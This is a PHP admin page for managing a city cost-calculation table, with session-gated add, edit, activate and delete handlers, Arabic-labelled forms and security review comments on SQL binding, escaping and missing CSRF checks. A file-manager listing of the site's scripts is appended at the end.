<?php 
// Output buffering is switched on before anything is printed; the handlers
// below call header() after init.php has been included and after error
// markup has been echoed, which only works while output is still buffered.
ob_start();
session_start();
?>
<?php
// Access gate for the whole page: the body runs only when the admin session
// key is set and the session type equals the manager marker. The matching
// else branch at the end of the file redirects everyone else to index.php.
// NOTE(review): the type check uses loose == and reads $_SESSION['type']
// without isset(); === plus an isset() guard would be stricter.
if(isset($_SESSION['user_liwwan_admin_2023930']) AND ($_SESSION['type'] == "manager_session_alliwan") ){
    
    $pageTitle  = 'city Controll';
    // presumably init.php provides $conn, which every handler below uses; it is not shown here
    include 'init.php';
?>
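<?php
/*
 * ACTIVE citycalc: set citcalc_active = 1 on one citycostscalc row, then
 * return to the listing page.
 *
 * Security: citycalc_id is taken from the POST body. It is validated as an
 * integer and passed as a bound parameter. Interpolating it into the SQL
 * text would leave the query injectable even though prepare() is used,
 * because prepare() only protects values supplied through placeholders.
 * NOTE(review): no CSRF token is checked in this handler; confirm whether
 * one is enforced elsewhere (e.g. in init.php).
 */
if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['activecitycalc'])) {

    // FILTER_VALIDATE_INT yields false for missing, non-numeric or array input.
    $adid = isset($_POST["citycalc_id"]) ? filter_var($_POST["citycalc_id"], FILTER_VALIDATE_INT) : false;

    // Skip the UPDATE for an invalid id; the redirect below still happens.
    if ($adid !== false) {
        $stmt = $conn->prepare("UPDATE 
                                citycostscalc 
                                SET
                                citcalc_active   = 1
                                WHERE
                                citcalc_id  = :zid
                                ");
        $stmt->execute(array('zid' => $adid));
    }

    header('location:citycalc.php');
    exit();
}?>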
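<?php
/*
 * PEND citycalc: set citcalc_active = 0 on one citycostscalc row, then
 * return to the listing page.
 *
 * Security: citycalc_id is taken from the POST body. It is validated as an
 * integer and passed as a bound parameter. Interpolating it into the SQL
 * text would leave the query injectable even though prepare() is used,
 * because prepare() only protects values supplied through placeholders.
 * NOTE(review): no CSRF token is checked in this handler; confirm whether
 * one is enforced elsewhere (e.g. in init.php).
 */
if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['pendcitycalc'])) {

    // FILTER_VALIDATE_INT yields false for missing, non-numeric or array input.
    $adid = isset($_POST["citycalc_id"]) ? filter_var($_POST["citycalc_id"], FILTER_VALIDATE_INT) : false;

    // Skip the UPDATE for an invalid id; the redirect below still happens.
    if ($adid !== false) {
        $stmt = $conn->prepare("UPDATE 
                                citycostscalc 
                                SET
                                citcalc_active   = 0
                                WHERE
                                citcalc_id  = :zid
                                ");
        $stmt->execute(array('zid' => $adid));
    }

    header('location:citycalc.php');
    exit();
}?>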
<?php 
/*
 * Delete citycalc: remove one citycostscalc row, then return to the listing.
 * The id reaches the query only through the :zid placeholder, so it cannot
 * alter the SQL text.
 * NOTE(review): this is a destructive action and no CSRF token is checked
 * in this handler; confirm whether one is enforced elsewhere.
 */
if (isset($_POST['delcitycalc'])){
    $rowId = $_POST["citycalc_id"];

    $deleteStmt = $conn->prepare("DELETE FROM  citycostscalc WHERE citcalc_id  = :zid");
    $deleteStmt->execute(array(":zid" => $rowId));

    header('location:citycalc.php');
    exit();
}
?>
<?php
/*
 * Add citycalc: insert a new citycostscalc row from the submitted form.
 * All five values reach the INSERT through named placeholders.
 * On success the browser is sent to citycalc.php; when the English name is
 * empty it is sent to ac_workshops.php with a URL-encoded error message.
 * NOTE(review): FILTER_SANITIZE_STRING is deprecated since PHP 8.1; the
 * bound parameters, not this filter, are what keep the query safe.
 * NOTE(review): the error redirect targets ac_workshops.php rather than a
 * citycalc page; confirm that is intended.
 */
if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['do_addcitycalc'])) {

    $nameEn   = filter_var($_POST['city_name'], FILTER_SANITIZE_STRING);
    $nameAr   = filter_var($_POST['city_arname'], FILTER_SANITIZE_STRING);
    $orderNum = filter_var($_POST['city_ordnum'], FILTER_SANITIZE_NUMBER_INT);
    $calcType = filter_var($_POST['city_acctype'], FILTER_SANITIZE_NUMBER_INT);
    $plusNum  = filter_var($_POST['city_plusnumber'], FILTER_SANITIZE_STRING);

    // Collect validation problems; only the English name is required.
    $problems = array();
    if (empty($nameEn)) {
        $problems[] = ' city name amount Cant Be <strong>Empty</strong> ';
    }

    // Print every collected problem into the (buffered) page output.
    foreach ($problems as $problem) {
        echo '<div class= "alert alert-danger text-center">' .  $problem .  '</div>' ;
    }

    // Failure path first: redirect with the generic error message.
    if (!empty($problems)) {
        $msg = urlencode("البيانات المدخلة تحتوي على مشكلة" . "، أعد المحاولة");
        header('location:ac_workshops.php?Message='. $msg);
        exit();
    }

    $insertStmt = $conn->prepare("INSERT INTO
                  citycostscalc(citcalc_name, citcalc_arname, citcalc_ordernum, citcalc_type, citcalc_plusnumber, citcalc_active)
                  VALUES (:zname, :zarname, :zordnum,:ztype,:zplusnum, 1 ) ");

    $insertStmt->execute(array(
        'zname'    => $nameEn,
        'zarname'  => $nameAr,
        'zordnum'  => $orderNum,
        'ztype'    => $calcType,
        'zplusnum' => $plusNum
    ));

    header('location:citycalc.php');
    exit();
}
?>
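<?php
/*
 * EDIT CITY Calc: update one citycostscalc row from the submitted edit form.
 *
 * Security: city_idis is an editable form field, so it is untrusted input.
 * It is validated as an integer and bound through a placeholder like the
 * other columns; interpolating it into the WHERE clause would make the
 * statement injectable despite the use of prepare().
 * On success the browser is sent to citycalc.php; on a validation error it
 * is sent to ac_workshops.php with a URL-encoded message.
 * NOTE(review): FILTER_SANITIZE_STRING is deprecated since PHP 8.1.
 * NOTE(review): no CSRF token is checked in this handler; confirm whether
 * one is enforced elsewhere.
 */
if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['do_editcitycalc'])) {

    // FILTER_VALIDATE_INT yields false for missing, non-numeric or array input.
    $cityid        = isset($_POST['city_idis']) ? filter_var($_POST['city_idis'], FILTER_VALIDATE_INT) : false;
    $cityname      = filter_var($_POST['city_name'], FILTER_SANITIZE_STRING);
    $cityarname    = filter_var($_POST['city_arname'], FILTER_SANITIZE_STRING);
    $cityordnum    = filter_var($_POST['city_ordnum'], FILTER_SANITIZE_NUMBER_INT);
    $cityacctype   = filter_var($_POST['city_acctype'], FILTER_SANITIZE_NUMBER_INT);
    $plusnumber    = filter_var($_POST['city_plusnumber'], FILTER_SANITIZE_STRING);

    $formErrors = array();

    if ($cityid === false) {
        // An invalid id takes the same error path as any other bad field.
        $formErrors[] = ' city id is <strong>invalid</strong> ';
    }
    if (empty($cityname)) {
        $formErrors[] = ' city name name Cant Be <strong>Empty</strong> ';
    }

    // Print every collected error into the (buffered) page output.
    foreach ($formErrors as $error) {
        echo '<div class= "alert alert-danger text-center">' .  $error .  '</div>' ;
    }

    if (empty($formErrors)) {

        $editwsh = $conn->prepare("UPDATE 
                             citycostscalc 
                             SET
                             citcalc_name        =?,
                             citcalc_arname      =?,
                             citcalc_ordernum    =?,
                             citcalc_type        =?,
                             citcalc_plusnumber  =?

                             WHERE
                             citcalc_id   = ? ");
        // The row id is the last positional parameter, matching the WHERE clause.
        $editwsh->execute(array($cityname, $cityarname, $cityordnum, $cityacctype, $plusnumber, $cityid));

        header('location:citycalc.php');
        exit();

    } else {
        $msg = urlencode("البيانات المدخلة تحتوي على مشكلة" . "، أعد المحاولة");
        header('location:ac_workshops.php?Message='. $msg);

        exit();
    }
}
?>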
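<?php 
/*
 * Add form: rendered when the listing page posts addcitycalc. The form posts
 * back to this same script, where the do_addcitycalc handler inserts the row.
 *
 * Security: PHP_SELF includes any extra path segment the client appended to
 * the script URL, so it is HTML-escaped before being written into the
 * action attribute.
 * NOTE(review): the form carries no CSRF token; confirm whether one is
 * enforced elsewhere.
 */
if(isset($_POST['addcitycalc'])){
?>
<section class="add_my">
    <form action="<?php echo htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" method="POST" class="form mt-5">
        <p class="text-center h3 fw-bold text-center m-auto add_my_p"> إضافة مدينة جديدة </p>
        <div class="row">
            <div class="input-group">
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" class="w-100 fw-bold py-2" name="city_name" id="city_name" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> إسم المدينة باللغة الإنكليزية <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" class="w-100 fw-bold py-2"  name="city_arname" id="city_arname" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> إسم المدينة باللغة العربية <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" class="w-100 fw-bold py-2" name="city_ordnum" id="city_ordnum" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> ترتيب الظهور (رقم للترتيب وفقه) <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <hr>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="double" class="w-100 fw-bold py-2" name="city_plusnumber" id="city_plusnumber" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> المبلغ الإضافي للمدينة <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <hr>
                <div class="col-12">
                    <div class="type mt-4 w-50 m-auto">
                        <label for="type" class="text-muted fw-bold text-center"> نوع العملية الحسابية <span class="text-danger fs-5">◈</span></label>
                        <select class="form-select" aria-label="Default select example bg-white" name="city_acctype" required="required">
                        <option selected disabled class="fw-bold text-primary"> إختر نوع العملية الحسابية </option>
                        <option value="1"> جمع الرقم للناتج الإجمالي </option>
                        <option value="2"> ضرب الناتج الإجمالي بالرقم (زيادة نسبة مئوية) </option>
                        </select>
                    </div>
                </div>
            </div>          
            <hr>
            <div class="col-8"></div>
            <div class="col-4">
            <button class="btn btn-primary px-4" name="do_addcitycalc" type="submit"> تأكيد </button>
            </div>
        </div>
    </form>
</section>
<?php }?>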

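<?php 
/*
 * Edit form: rendered when the listing page posts editcitycalc. Loads the
 * row named by citcalc_id and pre-fills a form that posts back to this
 * script, where the do_editcitycalc handler applies the change.
 *
 * Security:
 *  - citcalc_id is untrusted POST input; it is validated as an integer and
 *    bound through a placeholder instead of being interpolated into the
 *    SELECT, which would be injectable even with prepare().
 *  - Every database value and PHP_SELF is HTML-escaped before it is written
 *    into an attribute. double_encode is off so entities already stored by
 *    FILTER_SANITIZE_STRING (e.g. &#39;) are displayed as before.
 *  - A missing or invalid id redirects to the listing instead of rendering
 *    a form from an empty result.
 * NOTE(review): city_idis is a visible, editable text field; the edit
 * handler must keep treating it as untrusted input.
 */
if(isset($_POST['editcitycalc'])){
// FILTER_VALIDATE_INT yields false for missing, non-numeric or array input.
$cityid  = isset($_POST['citcalc_id']) ? filter_var($_POST['citcalc_id'], FILTER_VALIDATE_INT) : false;

$cityinfo = false;
if ($cityid !== false) {
    // select All Data Depend on this ID
    $stmacc = $conn->prepare("SELECT * FROM citycostscalc WHERE citcalc_id  = ?");
    // execute Query
    $stmacc->execute(array($cityid));
    // fetch the data
    $cityinfo = $stmacc->fetch();
}

// No usable row: go back to the listing rather than render an empty form.
if (!$cityinfo) {
    header('location:citycalc.php');
    exit();
}
?>
<section class="add_my">
    <form action="<?php echo htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" method="POST" class="form mt-5">
        <p class="text-center h3 fw-bold text-center m-auto add_my_p"> تعديل مدينة </p>
        <div class="row">
            <div class="input-group">
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" value="<?php echo htmlspecialchars((string) $cityinfo['citcalc_id'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false); ?>" name="city_idis">
                                <input type="text" value="<?php echo htmlspecialchars((string) $cityinfo['citcalc_name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false); ?>" class="w-100 fw-bold py-2" name="city_name" id="city_name" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> إسم المدينة باللغة الإنكليزية <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" value="<?php echo htmlspecialchars((string) $cityinfo['citcalc_arname'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false); ?>" class="w-100 fw-bold py-2"  name="city_arname" id="city_arname" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> إسم المدينة باللغة العربية <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" value="<?php echo htmlspecialchars((string) $cityinfo['citcalc_ordernum'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false); ?>" class="w-100 fw-bold py-2" name="city_ordnum" id="city_ordnum" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> ترتيب الظهور (رقم للترتيب وفقه) <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <hr>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="double" value="<?php echo htmlspecialchars((string) $cityinfo['citcalc_plusnumber'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false); ?>" class="w-100 fw-bold py-2" name="city_plusnumber" id="city_plusnumber" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> المبلغ الإضافي للمدينة <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <hr>
                <div class="col-12">
                    <div class="type mt-4 w-50 m-auto">
                        <label for="type" class="text-muted fw-bold text-center"> نوع العملية الحسابية <span class="text-danger fs-5">◈</span></label>
                        <select class="form-select" aria-label="Default select example bg-white" name="city_acctype" required="required">
                        <option value="1" <?php if($cityinfo['citcalc_type'] == 1){echo "selected";} ?> > جمع الرقم للناتج الإجمالي </option>
                        <option value="2" <?php if($cityinfo['citcalc_type'] == 2){echo "selected";} ?> > ضرب الناتج الإجمالي بالرقم (زيادة نسبة مئوية) </option>
                        </select>
                    </div>
                </div>
            </div>          
            <hr>
            <div class="col-8"></div>
            <div class="col-4">
            <button class="btn btn-primary px-4" name="do_editcitycalc" type="submit"> تأكيد </button>
            </div>
        </div>
    </form>
</section>
<?php }?>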



<?php
// Send the buffered page output, then append the shared footer template.
ob_end_flush();
include 'assets/includes/template/footer.php';
?>
<?php
// Closes the session gate opened at the top of the file: a request without
// the expected admin session is redirected to index.php and nothing above runs.
}else{
header('Location:index.php');
exit;
}
?>

Filemanager

Name Type Size Permission Actions
assets Folder 0755
images Folder 0755
ac_citycalc.php File 15.27 KB 0644
ac_edit_admin.php File 2.67 KB 0644
ac_edit_admininfo.php File 4.36 KB 0644
ac_edit_imgs.php File 34.27 KB 0644
ac_edit_pr.php File 10.72 KB 0644
ac_projects.php File 5.24 KB 0644
ac_workshops.php File 18.62 KB 0644
add_admin.php File 4.32 KB 0644
add_customer_template.php File 11.1 KB 0644
add_project.php File 17.22 KB 0644
add_workshop.php File 5.15 KB 0644
admins.php File 4.81 KB 0644
citycalc.php File 5.01 KB 0644
cons_orders.php File 4.51 KB 0644
custommer_templates.php File 4.59 KB 0644
dashboard.php File 4.11 KB 0644
edit_cus_template.php File 11.74 KB 0644
editadminpassword.php File 5.17 KB 0644
error_log File 309.84 KB 0644
imgs.php File 18.17 KB 0644
index.php File 3.19 KB 0644
init.php File 183 B 0644
logout.php File 186 B 0644
newsletter.php File 3.13 KB 0644
projects.php File 13.89 KB 0644
projects_card.php File 13.29 KB 0644
show.php File 8.81 KB 0644
workshop_details.php File 12.08 KB 0644
workshops.php File 4.63 KB 0644